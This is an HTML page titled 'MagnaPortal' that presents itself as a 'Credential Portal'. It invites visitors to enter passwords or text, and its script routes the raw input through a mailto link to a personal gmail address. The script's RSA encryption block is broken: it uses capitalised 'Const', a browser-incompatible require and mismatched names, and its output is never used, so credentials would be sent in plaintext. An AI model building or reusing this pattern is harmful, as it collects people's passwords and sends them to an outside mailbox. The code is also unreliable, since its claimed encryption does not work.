<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<title>MagnaPortal</title>
<style>

:root {
  --time: 4s;
}
.button {
  background-color: orange; /* Green */
  border: none;
  color: white;
  padding: 16px 32px;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  font-size: 16px;
  margin: 20px 140px;
  transition-duration: 0.4s;
  cursor: pointer;
}
.button:hover {
  background-color: gray;
  font-size: 20px;
  color: orange;
  border-radius: 10px;
  text-align: start;

}

img {
	animation: fly 1.5s;
	top: 0;
	left: 0;
	position: absolute;
	z-index: 999;
	pointer-events: none;
}

.pey {
	opacity: 0;
	animation-name: peek;
	animation-delay: var(--time);
	animation-duration: 3s;
	top: 0;
	left: 0;
	position: absolute;
	z-index: 998;
	pointer-events: none;
	transform: rotate(90deg);
}


@keyframes fly {

	0%{
		left: -25%;
		opacity: .25;
	}
	 50%{
		left: 0%;
		opacity: .5;
	}
	 100%{
		left: 0%;
		opacity: 1;
	}
}

@keyframes peek {

	0%{
		left: 0%;
		opacity: .25;
	}
	 50%{
		left: 40px;
		opacity: .5;
	}
	 65%{
		left: 40px;
		opacity: .5;
	}
	 100%{
		left: -5%;
		opacity: 1;
	}
}

</style>
</head>

<body style="overflow:hidden">
<div style="display: flex">
	<div style="flex: 1">
		<img src="magna.png" width="100" height="100" alt="Magna Logo">
		<img class="pey" src="p.png" width="100" height="100" alt="Peyton">
	</div>
	<div style="flex: 5;">
    	<h2 style="color:orange; font-size: 30px; animation: fly 1.5s">Credential Portal</h2>
	</div>
</div>
<p>Type in the text you would like to Send:</p>
<input type="radio" name="option" id="discovery"><label for="discovery"><b> Send with Web</b></label>
<input type="radio" name="option" id="beacon_accuracy"><label for="beacon_accuracy"><b> Send with Email</b></label>
<br><br>
<div id="option1">Credentials or Text &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input id="weburl" type="text" placeholder=" yourpassword here" style="background-color: lightgrey;width: 300px;margin: 5px 10px;color: orange;height:20px"><br></div>
<br><br>
<button  style="height:50px;width:100px;" id="send" type="submit" class="button">Send</button>

<script>


	function getRandomInt(max) {
	  return Math.floor(Math.random() * max);
	}

	var r = document.querySelector(':root');

	r.style.setProperty('--time', (6 + getRandomInt(3)).toString()+'s');

	document.getElementById("send").addEventListener("click", () => createEmail());

	function createEmail() {
		if(document.getElementById('beacon_accuracy').checked){
            Const JSEncrypt = require ("jsencrypt"); // Introduce module
            const str = document.getElementById('weburl').value;
            Const publicKey = 'AAAAB3NzaC1yc2EAAAADAQABAAABAQCDLXIpiJjPPGM47dv9BK7dWiVcqCsdtI04tABmXJuhspZZMc7qvDvfz+ThUe/DNb5++DfMt0VYVi0fayCI0qcZ57Uw0STy6L+DPIXYPvDYDzWYJwuMrX/N6RCR7zutc+3wr0V+2lWcEXARQGK6LqOdVHADLilGWqaOiHeCu+6gMkhiPEGlDGCLGe9vvlSMo6X+2b2AYnGkBOaCLhXa94emSp0UlBfM1jChJnpVgAE6p/uauNj3bCBPy1MSYryz3dzvSs6wRkyid5BNRyIDs7JOk2hUtflYyYJwNCHnW9/v1tspTtFPbmxcYczS9fZMG6awDNjUaVsqX1FTJAxbC/K3';
            Const encrypt = new JSEncrypt. JSEncrypt (); // instantiate encrypted objects
            Encrypt.setPublicKey (publicKey); //Set public key
            Const encryptoPasswd = encrypt. encrypt (str) // encrypted plaintext
			document.location.href='mailto:jarviscarrascosa@gmail.com?subject=Report&body=' + document.getElementById('weburl').value;
		}
	}


</script>
</body>
</html>
